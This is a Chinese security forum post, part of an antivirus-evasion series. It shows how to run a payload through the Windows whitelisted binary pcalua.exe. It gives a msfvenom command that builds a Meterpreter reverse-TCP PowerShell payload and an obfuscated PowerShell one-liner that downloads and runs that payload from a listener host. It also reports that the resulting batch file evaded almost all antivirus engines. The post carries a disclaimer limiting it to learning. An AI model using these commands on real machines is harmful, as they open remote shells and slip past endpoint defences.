安全矩阵

 找回密码
 立即注册
搜索
查看: 2763|回复: 0

远控免杀专题(55)-白名单Pcalua.exe执行payload

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-3-27 13:33:03 | 显示全部楼层 |阅读模式
原文链接:远控免杀专题(55)-白名单Pcalua.exe执行payload
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、Pcalua介绍
Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
默认在C:\Windows\System32\pcalua.exe

二、Pcalua使用
命令为
  1. Pcalua -m -a payload
复制代码

三、执行payload

这里选择使用powershell生成payload
  1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1
复制代码
并对powershell命令进行混淆处理。
  1. powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"
复制代码

然后将该命令写成a.bat批处理,方便执行。metasploit进行监听


在测试机上执行该命令
  1. Pcalua -m -a a.bat
复制代码


发现只有火绒提示"powershell可执行操作"放行后msf可上线



放在virustotal.com上a.bat查杀率为1/56



四、参考资料
基于白名单Wmic 执行 payload 第十季复现:https://blog.csdn.net/ws13129/article/details/89791442


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 15:10 , Processed in 0.014417 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表